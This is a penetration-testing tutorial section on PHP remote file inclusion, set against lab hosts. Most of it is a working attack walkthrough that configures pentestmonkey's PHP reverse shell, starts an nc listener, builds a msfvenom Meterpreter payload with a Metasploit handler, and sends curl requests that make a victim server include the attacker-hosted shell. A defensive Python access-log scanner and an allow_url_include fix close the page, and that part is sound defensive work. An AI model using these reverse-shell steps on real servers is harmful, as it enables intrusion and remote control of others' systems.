10.5 : Web app exploitation - Remote file inclusion (Part V)

Remote file inclusion

  • the vulnerable application includes a file from a URL supplied by the attacker, so PHP code hosted on the attacker's server is executed on the victim's server.

Cracking a PHP Linux server RFI

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.php

Edit it with your favourite text editor; the IP address and port the shell connects back to need to be changed.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...

Host it on a web server you control, and make sure that server serves the file as plain text rather than passing it to php-fpm (otherwise the shell would run on your own host instead of the victim's).

Go back to your Kali Linux box and start a listener on port 4444:

root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
...

Now make the victim include the file; the request looks something like this:

curl http://192.168.56.104/?page=http://192.168.56.101/shell.php

Cracking a PHP Windows server RFI

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 > shell.php

Host it on a web server you control, and make sure that server serves the file as plain text rather than passing it to php-fpm (otherwise the payload would run on your own host instead of the victim's).

Go back to your Kali Linux box, start msfconsole and use exploit/multi/handler:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
exploit

Now make the victim include the file; the request looks something like this:

curl http://192.168.56.104/?page=http://192.168.56.101/shell.php

Back in msfconsole on Kali, a Meterpreter session should now be open.
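From the defender's side, the request used in both walkthroughs above leaves a distinctive trace in the web server's access log: a query parameter whose value is itself a URL. The following Python script is an added example, not code from the original page, that flags such requests in combined-format (nginx/Apache) access logs; the sample log lines are constructed, not taken from a real server.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format as written by nginx/Apache: client, ident, user, time,
# request line, status, bytes. Only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# URL wrappers PHP's include() will fetch when allow_url_include is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def remote_params(target):
    """Return [(param, decoded_value)] for query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decode again so that
        # double-encoded values (e.g. %2568ttp...) are still recognised.
        decoded = unquote(value).strip()
        if decoded.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return one finding per request that carries a remote URL in a query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = remote_params(m.group("target"))
        if hits:
            findings.append({"client": m.group("client"), "time": m.group("time"),
                             "status": m.group("status"), "params": hits})
    return findings


# Constructed sample lines: one benign include, two RFI attempts (plain and
# percent-encoded), and a benign search query that merely mentions "https".
SAMPLE = [
    '192.168.56.101 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.168.56.101 - - [10/Oct/2023:13:55:40 +0000] "GET /?page=http://192.168.56.101/shell.php HTTP/1.1" 200 0',
    '192.168.56.101 - - [10/Oct/2023:13:55:44 +0000] "GET /?page=%68ttp%3a%2f%2f192.168.56.101%2Fshell.php HTTP/1.1" 200 0',
    '10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=https+vs+http HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE):
        print(f"{f['time']} {f['client']} status={f['status']} {f['params']}")
```

The fix on the application side is to keep PHP's allow_url_include directive off (its default) and to map the page parameter onto an allowlist of local files instead of handing it to include() directly.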